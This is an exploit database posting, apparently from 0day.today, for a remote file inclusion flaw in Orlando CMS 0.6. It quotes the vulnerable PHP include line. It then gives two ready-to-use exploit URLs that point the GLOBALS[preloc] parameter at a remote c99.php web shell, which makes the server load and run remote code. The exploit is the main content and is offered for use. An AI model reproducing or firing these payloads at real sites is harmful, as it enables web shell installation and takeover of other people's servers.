[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Orlando CMS 0.6 Remote File Inclusion Vulnerabilities

Author
Ciph3r
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3225
Category
web applications
Date add
18-06-2008
Platform
unsorted
=====================================================
Orlando CMS 0.6 Remote File Inclusion Vulnerabilities
=====================================================



###############################################################
#
# Orlando CMS classes Remote File Include Vulnerabilities
#
###############################################################
#
# Discovered by : Ciph3r
#
#
# SP TANX4 : Iranian hacker & Kurdish Security TEAM
#
# CLASS : remote
#
# download cms: http://sourceforge.net/project/showfiles.php?group_id=195547
#
################################################################
#
# C0de :
#               
#               
#  include($GLOBALS['preloc']."modules/core/logger/sticky.php");
#     
#       
###############################################################

EXPLOIT :

http://127.0.0.1/cms/Orlando/modules/core/logger/init.php?GLOBALS[preloc]=http://127.0.0.1/c99.php?

http://127.0.0.1/cms/Orlando/AJAX/newscat.php?GLOBALS[preloc]=http://127.0.0.1/c99.php?

#####################################################################



#  0day.today [2024-12-27]  #